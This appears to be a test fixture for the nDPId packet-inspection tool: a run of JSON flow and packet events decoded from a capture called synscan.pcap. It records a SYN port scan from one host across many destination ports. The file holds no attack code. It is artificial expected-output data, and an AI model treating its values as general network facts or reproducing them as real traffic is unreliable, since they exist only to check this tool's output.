+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":190,"source":"synscan.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9575,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":190,"source":"synscan.pcap","alias":"nDPId-test","flow_id":184,"flow_packet_id":1,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058280,"pkt":"ACYLMQczACWzv5HuCABFAAAsUkAAADMGwzKsEAAIQA2GNIzSJWfdUoMYAAAAAGACEAADKAAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":191,"source":"synscan.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32768,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":191,"source":"synscan.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":1,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058280,"pkt":"ACYLMQczACWzv5HuCABFAAAsUOAAAC8GyJKsEAAIQA2GNIzSgADdUoMYAAAAAGACEACojgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":192,"source":"synscan.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1641,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":192,"source":"synscan.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":1,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058280,"pkt":"ACYLMQczACWzv5HuCABFAAAsD6cAADIGBsysEAAIQA2GNIzSBmndUoMYAAAAAGACDAAmJgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":193,"source":"synscan.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5825,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"synscan.pcap","alias":"nDPId-test","flow_id":187,"flow_packet_id":1,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058280,"pkt":"ACYLMQczACWzv5HuCABFAAAsxQcAADIGUWusEAAIQA2GNIzSFsHdUoMYAAAAAGACDAAVzgAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":194,"source":"synscan.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9898,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":194,"source":"synscan.pcap","alias":"nDPId-test","flow_id":188,"flow_packet_id":1,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058280,"pkt":"ACYLMQczACWzv5HuCABFAAAsiBIAADgGiGCsEAAIQA2GNIzSJqrdUoMYAAAAAGACBAAN5QAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":195,"source":"synscan.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27355,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":195,"source":"synscan.pcap","alias":"nDPId-test","flow_id":189,"flow_packet_id":1,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058280,"pkt":"ACYLMQczACWzv5HuCABFAAAsY2AAADUGsBKsEAAIQA2GNIzSatvdUoMYAAAAAGACCADFswAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":196,"source":"synscan.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1583,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":196,"source":"synscan.pcap","alias":"nDPId-test","flow_id":190,"flow_packet_id":1,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058280,"pkt":"ACYLMQczACWzv5HuCABFAAAss00AACYGbyWsEAAIQA2GNIzSBi\/dUoMYAAAAAGACDAAmYAAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":197,"source":"synscan.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":197,"source":"synscan.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":1,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058280,"pkt":"ACYLMQczACWzv5HuCABFAAAsNBUAADsG2V2sEAAIQA2GNIzSGbTdUoMYAAAAAGACEAAO2wAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":198,"source":"synscan.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":198,"source":"synscan.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":1,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058280,"pkt":"ACYLMQczACWzv5HuCABFAAAsz7wAACUGU7asEAAIQA2GNIzSC7ndUoMYAAAAAGACCAAk1gAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":199,"source":"synscan.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058281,"flow_last_seen":1278275058281,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058281,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2190,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":199,"source":"synscan.pcap","alias":"nDPId-test","flow_id":193,"flow_packet_id":1,"flow_last_seen":1278275058281,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058281,"pkt":"ACYLMQczACWzv5HuCABFAAAsAdoAACsGG5msEAAIQA2GNIzSCI7dUoMYAAAAAGACEAAgAQAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":200,"source":"synscan.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058281,"flow_last_seen":1278275058281,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058281,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49155,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":200,"source":"synscan.pcap","alias":"nDPId-test","flow_id":194,"flow_packet_id":1,"flow_last_seen":1278275058281,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058281,"pkt":"ACYLMQczACWzv5HuCABFAAAs2W4AACcGSASsEAAIQA2GNIzSwAPdUoMYAAAAAGACEABoiwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":201,"source":"synscan.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2869,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":201,"source":"synscan.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":1,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058345,"pkt":"ACYLMQczACWzv5HuCABFAAAs3SEAACsGQFGsEAAIQA2GNIzTCzXdU4MZAAAAAGACEAAdVwAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":202,"source":"synscan.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":497,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":202,"source":"synscan.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":1,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058345,"pkt":"ACYLMQczACWzv5HuCABFAAAsJv0AADkG6HWsEAAIQA2GNIzTAfHdU4MZAAAAAGACCAAumwAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":203,"source":"synscan.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":61532,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":203,"source":"synscan.pcap","alias":"nDPId-test","flow_id":197,"flow_packet_id":1,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058345,"pkt":"ACYLMQczACWzv5HuCABFAAAsXWIAADEGuhCsEAAIQA2GNIzT8FzdU4MZAAAAAGACCABALwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":204,"source":"synscan.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":204,"source":"synscan.pcap","alias":"nDPId-test","flow_id":198,"flow_packet_id":1,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058345,"pkt":"ACYLMQczACWzv5HuCABFAAAsw9gAACsGWZqsEAAIQA2GNIzTCDrdU4MZAAAAAGACEAAgUgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":205,"source":"synscan.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1073,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":205,"source":"synscan.pcap","alias":"nDPId-test","flow_id":199,"flow_packet_id":1,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058345,"pkt":"ACYLMQczACWzv5HuCABFAAAs6AwAADoGJmasEAAIQA2GNIzTBDHdU4MZAAAAAGACDAAoWwAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":206,"source":"synscan.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13456,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":206,"source":"synscan.pcap","alias":"nDPId-test","flow_id":200,"flow_packet_id":1,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058345,"pkt":"ACYLMQczACWzv5HuCABFAAAs5F4AACoGOhSsEAAIQA2GNIzTNJDdU4MZAAAAAGACDAD3+wAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":207,"source":"synscan.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15660,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":207,"source":"synscan.pcap","alias":"nDPId-test","flow_id":201,"flow_packet_id":1,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058345,"pkt":"ACYLMQczACWzv5HuCABFAAAsRG4AADsGyQSsEAAIQA2GNIzTPSzdU4MZAAAAAGACEADrXwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":208,"source":"synscan.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":14000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":208,"source":"synscan.pcap","alias":"nDPId-test","flow_id":202,"flow_packet_id":1,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058345,"pkt":"ACYLMQczACWzv5HuCABFAAAsZD8AADMGsTOsEAAIQA2GNIzTNrDdU4MZAAAAAGACEADx2wAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":209,"source":"synscan.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":209,"source":"synscan.pcap","alias":"nDPId-test","flow_id":203,"flow_packet_id":1,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058345,"pkt":"ACYLMQczACWzv5HuCABFAAAsqbQAADoGZL6sEAAIQA2GNIzTJRzdU4MZAAAAAGACDAAHcAAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":210,"source":"synscan.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":425,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"synscan.pcap","alias":"nDPId-test","flow_id":204,"flow_packet_id":1,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058345,"pkt":"ACYLMQczACWzv5HuCABFAAAsdUEAADIGoTGsEAAIQA2GNIzTAandU4MZAAAAAGACDAAq4wAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":211,"source":"synscan.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5959,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":211,"source":"synscan.pcap","alias":"nDPId-test","flow_id":205,"flow_packet_id":1,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058345,"pkt":"ACYLMQczACWzv5HuCABFAAAssN0AACoGbZWsEAAIQA2GNIzTF0fdU4MZAAAAAGACDAAVRQAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":212,"source":"synscan.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7496,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":212,"source":"synscan.pcap","alias":"nDPId-test","flow_id":206,"flow_packet_id":1,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058345,"pkt":"ACYLMQczACWzv5HuCABFAAAsrmsAACwGbgesEAAIQA2GNIzSHUjdUoMYAAAAAGACBAAXRwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":213,"source":"synscan.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1071,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"synscan.pcap","alias":"nDPId-test","flow_id":207,"flow_packet_id":1,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058345,"pkt":"ACYLMQczACWzv5HuCABFAAAs2\/QAADYGNn6sEAAIQA2GNIzSBC\/dUoMYAAAAAGACDAAoYAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":214,"source":"synscan.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":30718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 